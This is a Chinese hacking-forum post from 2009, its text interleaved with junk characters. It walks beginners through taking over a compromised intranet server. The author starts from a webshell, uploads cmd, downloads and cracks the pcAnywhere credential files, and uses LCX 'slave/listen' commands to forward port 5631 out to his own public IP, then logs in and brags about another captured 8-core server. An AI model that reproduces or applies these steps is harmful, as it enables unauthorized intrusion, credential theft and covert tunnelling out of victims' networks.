|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
$ D- g* v& i) F3 H7 Q7 F: x1 g% R) A6 g; Q
提权方法:pcanywhere+LCX* E- w, P2 E8 h" _* K; \' z
/ S+ M5 q( J4 `; z1 D" u' ^获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。8 G/ I9 L) W* _2 ?) Q2 t
) `) h. ?, q. u$ w' V: v! p在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。& q0 A3 G/ i. l4 E/ E1 f
8 E, A2 y0 y& Y) r/ V
s' v3 E8 s& H* K* D
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
2 S6 R) h! v. y3 G& c) O! v8 r
8 \3 l* x7 Q/ H+ R! M; X+ D+ a3 J
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
8 v, O, Q4 m1 t2 ^
2 r. i9 R i+ m2 O: n& \+ M5 M {6 r! t& |4 ~; u2 m( ]3 v
" Q1 }% T( I/ Y( C/ u6 Y1 G: k6 e1 \8 x# Q' B
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
2 k1 _# k- a; B- h/ |: r6 y& J `4 J: G4 ?% ~. b+ d) S
, }2 r1 x9 L5 G. R0 nLCX的用法再简单说下:- g; {) K- O8 c; S7 R9 ?
, N' |9 ~' T: i4 {1 v% W: Q服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
# a0 L0 a$ |4 U+ f. F- d
% }8 Z7 {' B( m" C- `本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
( \7 l$ M# ^/ Z0 ~1 ^
, K2 [5 w( b+ q; S由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
/ k! x# R; q# Y! d, m+ z/ U顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
, h3 z: F& a7 N6 j; R) P. z. { [# C1 ]4 w2 P$ }3 f4 d
( v/ R0 k* x0 r7 L
2 ]6 e' Q" S: v" I
0 b y, K* ~8 L$ j# J/ `) o. u呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
0 h4 L0 [; ~) F# {
4 C$ ^4 H4 |* \' Z) x) J! t1 p9 h0 K- S8 ^, R% `
' H2 R0 n$ q9 m2 `+ i; P* r! f, `' N8 R) T& S( s6 Z
我们本地连接试试,输入我们刚破解的账号密码
9 i4 ~% P, }9 ~6 b8 Z' w+ W$ V
* H- g, P2 o* c' q; f( g- L6 v* y$ ^
呵呵``连接成功,服务器不错,又一个8核^︵^ s( `' k. M1 ]. ]2 N
/ w! y4 ]: X7 d8 i4 J: c* O7 M& @6 i8 x& J+ O1 l3 k
$ f5 t r, C/ M: n: I3 p( s% r. R- G5 ~ |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
